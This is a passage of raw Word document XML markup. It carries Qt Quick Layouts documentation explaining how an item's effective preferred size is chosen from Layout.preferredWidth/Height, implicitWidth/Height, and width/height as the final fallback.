          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Specifying Preferred Size</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1399"/>
      <w:bookmarkEnd w:id="1400"/>
      <w:bookmarkEnd w:id="1401"/>
      <w:bookmarkEnd w:id="1402"/>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For each item, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>effective preferred size may come from one of several candidate properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For determining the effective preferred size, it w</w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ill query these candidate properties in the following order, and use the first candidate with a valid width or height</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9235" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2285"/>
        <w:gridCol w:w="6950"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidTr="008F1DE7">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Candidate properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C570D9" w:rsidRPr="002230B8" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285"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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1704" w:anchor="preferredWidth-attached-prop" w:history="1">
              <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.preferredWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1705" w:anchor="preferredHeight-attached-prop" w:history="1">
              <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.preferredHeight</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>These properties are supposed to be modified by the application if the default implicit size does not give the optimal arrangement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C570D9" w:rsidRPr="002230B8" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1706" w:anchor="implicitWidth-prop" w:history="1">
              <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>implicitWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1707" w:anchor="implicitHeight-prop" w:history="1">
              <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>implicitHeight</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>These properties are supposed to be supplied by each item to give a meaningful ideal size, for example the size needed to display all the contents of a</w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1708" w:history="1">
              <w:r w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Text</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type. An implicit width or height of</w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is interpreted as invalid.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C570D9" w:rsidRPr="002230B8" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285"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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1709" w:anchor="width-prop" w:history="1">
              <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>width</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1710" w:anchor="height-prop" w:history="1">
              <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>height</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">If none of the above properties are valid, the layout will resort to </w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>the</w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1711" w:anchor="width-prop" w:history="1">
              <w:r w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>width</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1712" w:anchor="height-prop" w:history="1">
              <w:r w:rsidRPr="00C570D9">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>height</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>properties.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>An item can specify</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1713" w:anchor="preferredWidth-attached-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.preferredWidth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>without having to specify</w:t>
      </w:r>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1714" w:anchor="preferredHeight-attached-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.preferredHeight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this case</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the effective preferred height will be determined from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1715" w:anchor="implicitHeight-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>implicitHeight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(or ultimately</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1716" w:anchor="height-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>height</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resorting to</w:t>
      </w:r>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1717" w:anchor="width-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>width</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1718" w:anchor="height-prop" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>height</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties is only provided as a final fallback. If you want to override the preferred size, it is recommended to use</w:t>
      </w:r>
      <w:r w:rsidR="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
